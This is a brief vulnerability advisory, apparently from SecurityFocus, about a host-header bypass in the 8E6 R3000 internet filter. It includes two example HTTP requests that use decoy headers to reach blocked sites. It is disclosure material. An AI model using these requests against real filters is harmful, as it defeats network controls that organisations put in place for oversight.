8E6 Technologies R3000 Host Header Internet Filter Security Bypass Vulnerability

Attackers may exploit this issue through a browser.

The following example requests are available:

GET / HTTP/1.0
X-DecoyHost: www.allowed.org
Host: www.blocked.org

GET / HTTP/1.0
X-Decoy: Host: www.allowed.org
Host: www.blocked.org


 

Privacy Statement
Copyright 2010, SecurityFocus